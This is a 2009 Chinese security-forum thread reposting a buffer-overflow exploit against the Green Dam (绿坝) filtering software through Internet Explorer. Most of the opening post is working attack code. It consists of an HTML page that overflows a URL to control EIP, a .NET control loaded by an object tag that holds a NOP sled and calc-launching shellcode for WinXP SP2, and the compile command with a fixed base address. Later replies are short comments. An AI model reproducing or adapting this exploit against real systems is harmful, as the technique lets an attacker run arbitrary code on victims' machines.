【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [转]绿坝-花季护航的IE浏览器 Exploit [打印本页]

作者: 匿名 时间: 2009-8-3 10:43 标题: [转]绿坝-花季护航的IE浏览器 Exploit

出来好久了！很多人已经看过了，不过里面是用的.net控件加载shellcode的，放论坛里面备记一下。

html部分：
<html>




<head>
<script>
function x()
{
var url='';
for(var i=1; i<=2035; i++)
url += '$'; // '$' = 0x24, eip = 0x24242424, hum?;-)

window.location=url + '.html';
}
</script>

</head>

<body>

<object classID="exploit.dll#exploit.Shellcode"></object>


<input type="button" value="fire" onclick="x()" />
</body>

</html>

.net dll部分：
using System;
using System.Windows.Forms;

namespace exploit
{
public partial class Shellcode : UserControl
{
public Shellcode()
{
// Shellcode that opens calc.exe on WinXP sp2
// THOSE NOPS ARE NECESSARY, DO NOT REMOVE THEM WHEN U CHANGE SHELLCODE
String shellcode = "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u8b55\u33ec\u52d2\u5252\u45c6\u63f7\u45c6\u61f8\u45c6\u6cf9\u45c6\u63fa\u45c6\u2efb\u45c6\u65fc\u45c6\u78fd\u45c6\u65fe\u458d\u50f7\ub890\u114D\u7C86\ud0ff\ub890\uCAA2\u7C81\ud0ff\u9090";
}
}
}

编译方法：

Compile the c# .net binary which contains shellcode with the following instruction on VS environment:

CSC /nologo /target:library /platform:x86 /noconfig /baseaddress:0x24240000 /reference:C:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\System.dll /reference:C:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\System.Windows.Forms.dll /out:exploit.dll exploit.cs

作者: yyw258520 时间: 2009-8-3 12:45

和我在黑X书上看到的不一样！那个是直接找密码文件！破密码喔！

作者: xiaoqilinux 时间: 2009-10-21 03:38

作者: exists 时间: 2009-10-27 22:45

不知道这个溢出后的结果是什么样的？能不能有截图呢？

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)